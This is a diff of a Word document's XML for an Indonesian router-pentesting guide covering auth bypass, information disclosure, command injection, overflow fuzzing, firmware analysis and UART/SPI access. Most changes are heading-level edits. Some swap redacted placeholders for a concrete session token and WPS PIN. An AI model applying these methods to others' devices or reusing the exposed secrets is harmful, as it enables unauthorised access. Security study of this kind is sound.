+        <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
         <w:t>6.2 Brute-force path (jika source tidak membantu)</w:t>
@@ -5274,7 +5362,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
+        <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
         <w:t>6.3 Kebocoran file statis</w:t>
@@ -5366,7 +5454,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
         <w:t>7. Autentikasi &amp; Session</w:t>
@@ -5394,7 +5482,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
+        <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
         <w:t>7.1 Alur login normal</w:t>
@@ -5439,7 +5527,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
+        <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
         <w:t>7.2 Cookie sesi</w:t>
@@ -5454,7 +5542,7 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
           <w:sz w:val="18"/>
         </w:rPr>
-        <w:t>Set-Cookie: password=&lt;SESSION-TOKEN&gt;...; path=/</w:t>
+        <w:t>Set-Cookie: password=435ad074e1ae113f062860bf3b1627bd...; path=/</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5483,10 +5571,10 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-      </w:pPr>
-      <w:r>
-        <w:t>BAGIAN III — KELAS KERENTANAN &amp; POLA</w:t>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>KELAS KERENTANAN &amp; POLA</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5499,7 +5587,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
         <w:t>8. Auth Bypass &amp; Backdoor Account</w:t>
@@ -5507,7 +5595,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
+        <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
         <w:t>8.1 Apa &amp; mengapa terjadi</w:t>
@@ -5587,7 +5675,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
+        <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
         <w:t>8.2 Menemukannya (langkah)</w:t>
@@ -5696,7 +5784,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
+        <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
         <w:t>8.3 Pelajaran pola</w:t>
@@ -5747,7 +5835,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
+        <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
         <w:t>8.4 Dampak &amp; tingkat</w:t>
@@ -5803,7 +5891,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
         <w:t>9. Information Disclosure</w:t>
@@ -5819,7 +5907,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
+        <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
         <w:t>9.1 Bentuk-bentuk</w:t>
@@ -5963,63 +6051,63 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Heading4"/>
+      </w:pPr>
+      <w:r>
+        <w:t>9.2 Mengapa berbahaya</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t>Password WiFi cleartext = penyerang langsung bisa join jaringan. Daftar klien = untuk targeting. Versi firmware = untuk memilih exploit yang tepat.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading4"/>
+      </w:pPr>
+      <w:r>
+        <w:t>9.3 Pelajaran</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Cek endpoint 'Get*' — sering mengembalikan lebih banyak dari yang ditampilkan UI.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Perhatikan field seperti `wrlPwd`, `adslPwd`, `pppPwd`, `password`, `pinCode`.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>UI menyembunyikan password dengan bintang, tetapi API-nya mengirim teks asli.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
-        <w:t>9.2 Mengapa berbahaya</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-        <w:t>Password WiFi cleartext = penyerang langsung bisa join jaringan. Daftar klien = untuk targeting. Versi firmware = untuk memilih exploit yang tepat.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>9.3 Pelajaran</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Cek endpoint 'Get*' — sering mengembalikan lebih banyak dari yang ditampilkan UI.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Perhatikan field seperti `wrlPwd`, `adslPwd`, `pppPwd`, `password`, `pinCode`.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>UI menyembunyikan password dengan bintang, tetapi API-nya mengirim teks asli.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:r>
         <w:t>10. Command Injection</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
+        <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
         <w:t>10.1 Konsep</w:t>
@@ -6063,7 +6151,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
+        <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
         <w:t>10.2 Di mana mencarinya di router</w:t>
@@ -6103,7 +6191,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
+        <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
         <w:t>10.3 Cara menguji dengan aman</w:t>
@@ -6186,7 +6274,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
         <w:t>11. Buffer Overflow (Stack)</w:t>
@@ -6194,7 +6282,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
+        <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
         <w:t>11.1 Konsep</w:t>
@@ -6248,7 +6336,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
+        <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
         <w:t>11.2 Pola di Tenda (dari CVE publik, lini AC6 v2.0 / 15.03.06.x)</w:t>
@@ -6620,78 +6708,78 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Heading4"/>
+      </w:pPr>
+      <w:r>
+        <w:t>11.3 Cara menemukan &amp; menguji (aman)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Kirim string panjang bertahap (mis. 200, 500, 1000, 5000 byte) ke parameter kandidat.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Amati: respons error, koneksi putus, atau router reboot = indikasi overflow (DoS).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Untuk analisis mendalam: ekstrak httpd, buka di Ghidra, cari fungsi dari daftar CVE.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>Peringatan:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> uji overflow bisa </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>membuat web server crash/reboot</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t>. Lakukan saat Anda siap. Di buku ini kita tidak menembakkan payload perusak ke perangkat Anda.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
-        <w:t>11.3 Cara menemukan &amp; menguji (aman)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Kirim string panjang bertahap (mis. 200, 500, 1000, 5000 byte) ke parameter kandidat.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Amati: respons error, koneksi putus, atau router reboot = indikasi overflow (DoS).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Untuk analisis mendalam: ekstrak httpd, buka di Ghidra, cari fungsi dari daftar CVE.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>Peringatan:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> uji overflow bisa </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>membuat web server crash/reboot</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-        <w:t>. Lakukan saat Anda siap. Di buku ini kita tidak menembakkan payload perusak ke perangkat Anda.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:r>
         <w:t>12. CSRF &amp; XSS</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
+        <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
         <w:t>12.1 CSRF (Cross-Site Request Forgery)</w:t>
@@ -6748,55 +6836,55 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Heading4"/>
+      </w:pPr>
+      <w:r>
+        <w:t>12.2 XSS</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t>Jika input ditampilkan tanpa escape (mis. nama perangkat), skrip bisa jalan di browser admin. Cari field yang outputnya muncul kembali di halaman status/nama device.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading4"/>
+      </w:pPr>
+      <w:r>
+        <w:t>12.3 Pelajaran</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Cookie tanpa atribut SameSite + tidak ada token = rawan CSRF.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>UI menyembunyikan password, tapi API teks polos (lihat Bab 9).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
-        <w:t>12.2 XSS</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-        <w:t>Jika input ditampilkan tanpa escape (mis. nama perangkat), skrip bisa jalan di browser admin. Cari field yang outputnya muncul kembali di halaman status/nama device.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>12.3 Pelajaran</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Cookie tanpa atribut SameSite + tidak ada token = rawan CSRF.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>UI menyembunyikan password, tapi API teks polos (lihat Bab 9).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:r>
         <w:t>13. UPnP &amp; WPS</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
+        <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
         <w:t>13.1 UPnP</w:t>
@@ -6850,7 +6938,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
+        <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
         <w:t>13.2 WPS</w:t>
@@ -6937,7 +7025,7 @@
           <w:color w:val="555555"/>
           <w:sz w:val="18"/>
         </w:rPr>
-        <w:t>Gambar 9. WPS aktif dan PIN bocor (&lt;WPS-PIN&gt;).</w:t>
+        <w:t>Gambar 9. WPS aktif dan PIN bocor (69043949).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7018,10 +7106,10 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-      </w:pPr>
-      <w:r>
-        <w:t>BAGIAN IV — ANALISIS FIRMWARE</w:t>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>ANALISIS FIRMWARE</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7086,7 +7174,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
         <w:t>14. Akuisisi Firmware</w:t>
@@ -7126,7 +7214,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
+        <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
         <w:t>14.1 Jalur lunak</w:t>
@@ -7172,58 +7260,58 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Heading4"/>
+      </w:pPr>
+      <w:r>
+        <w:t>14.2 Jalur keras (saat alat tiba)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>UART: baca bootlog, mungkin masuk shell (Bab 19).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>SPI flash: dump chip dengan CH341A + clip SOIC-8 (Bab 20) → dapat firmware 'mentah' 100%.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>JTAG: akses tingkat rendah (boundary scan, debug).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>Mengapa dump fisik penting:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> firmware dari vendor bisa berbeda dari yang benar-benar ada di perangkat. Dump fisik = kebenaran.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>14.2 Jalur keras (saat alat tiba)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>UART: baca bootlog, mungkin masuk shell (Bab 19).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>SPI flash: dump chip dengan CH341A + clip SOIC-8 (Bab 20) → dapat firmware 'mentah' 100%.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>JTAG: akses tingkat rendah (boundary scan, debug).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>Mengapa dump fisik penting:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> firmware dari vendor bisa berbeda dari yang benar-benar ada di perangkat. Dump fisik = kebenaran.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
         <w:t>15. Ekstraksi Firmware</w:t>
@@ -7300,7 +7388,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
         <w:t>16. Analisis Filesystem</w:t>
@@ -7655,7 +7743,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
         <w:t>17. Analisis Statis Binary</w:t>
@@ -7671,7 +7759,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
+        <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
         <w:t>17.1 Teknik ringan (tanpa GUI)</w:t>
@@ -7699,75 +7787,75 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Heading4"/>
+      </w:pPr>
+      <w:r>
+        <w:t>17.2 Ghidra (analisis berat)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Buka binary di Ghidra, tunggu auto-analysis.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Gunakan Symbol Tree / Function List; cari nama fungsi dari CVE (mis. formSetPPTPServer).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Lihat XREF: dari string 'goform/...' → fungsi handler → fungsi parsing.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListNumber"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Tandai pola berbahaya: strcpy, sprintf, sscanf, system, popen, memcpy tanpa bound.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading4"/>
+      </w:pPr>
+      <w:r>
+        <w:t>17.3 Menghubungkan ke celah</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Contoh alur penemuan: find string `formSetPPTPServer` → handler memanggil `sscanf`/`strcpy` ke buffer kecil → parameter tak dibatasi → </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>stack overflow</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t>. Ini persis cara peneliti menemukan CVE-2024-51116.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>17.2 Ghidra (analisis berat)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Buka binary di Ghidra, tunggu auto-analysis.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Gunakan Symbol Tree / Function List; cari nama fungsi dari CVE (mis. formSetPPTPServer).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Lihat XREF: dari string 'goform/...' → fungsi handler → fungsi parsing.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Tandai pola berbahaya: strcpy, sprintf, sscanf, system, popen, memcpy tanpa bound.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>17.3 Menghubungkan ke celah</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Contoh alur penemuan: find string `formSetPPTPServer` → handler memanggil `sscanf`/`strcpy` ke buffer kecil → parameter tak dibatasi → </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>stack overflow</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-        <w:t>. Ini persis cara peneliti menemukan CVE-2024-51116.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
         <w:t>18. Emulasi Firmware</w:t>
@@ -7871,10 +7959,10 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-      </w:pPr>
-      <w:r>
-        <w:t>BAGIAN V — HARDWARE HACKING</w:t>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>HARDWARE HACKING</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7887,7 +7975,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
         <w:t>19. UART: Mendapatkan Console/Shell</w:t>
@@ -7895,7 +7983,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
+        <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
         <w:t>19.1 Konsep</w:t>
@@ -7935,7 +8023,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
+        <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
         <w:t>19.2 Langkah praktis</w:t>
@@ -7999,34 +8087,69 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Heading4"/>
+      </w:pPr>
+      <w:r>
+        <w:t>19.3 Yang dicari di bootlog</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Versi U-Boot &amp; cara masuk menu (spasi / tombol tertentu).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Prompt login root (kadang tanpa password, atau password default).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Nama partisi &amp; alamat memori (berguna untuk dump).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>Pelajaran:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> pin UART yang tidak diproteksi = seringkali shell penuh. Ini vektor fisik paling umum pada perangkat konsumen.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
-        <w:t>19.3 Yang dicari di bootlog</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Versi U-Boot &amp; cara masuk menu (spasi / tombol tertentu).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Prompt login root (kadang tanpa password, atau password default).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Nama partisi &amp; alamat memori (berguna untuk dump).</w:t>
+        <w:t>20. SPI Flash &amp; CH341A</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading4"/>
+      </w:pPr>
+      <w:r>
+        <w:t>20.1 Konsep</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8034,71 +8157,36 @@
         <w:rPr>
           <w:b w:val="0"/>
         </w:rPr>
+        <w:t xml:space="preserve">Firmware tersimpan di chip flash (sering </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t>Pelajaran:</w:t>
+        <w:t>SPI NOR</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
         </w:rPr>
-        <w:t xml:space="preserve"> pin UART yang tidak diproteksi = seringkali shell penuh. Ini vektor fisik paling umum pada perangkat konsumen.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:r>
-        <w:t>20. SPI Flash &amp; CH341A</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>20.1 Konsep</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
+        <w:t xml:space="preserve">, 8-pin SOIC). Dengan CH341A + clip/solder, kita bisa </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>membaca (dump)</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
         </w:rPr>
-        <w:t xml:space="preserve">Firmware tersimpan di chip flash (sering </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>SPI NOR</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, 8-pin SOIC). Dengan CH341A + clip/solder, kita bisa </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
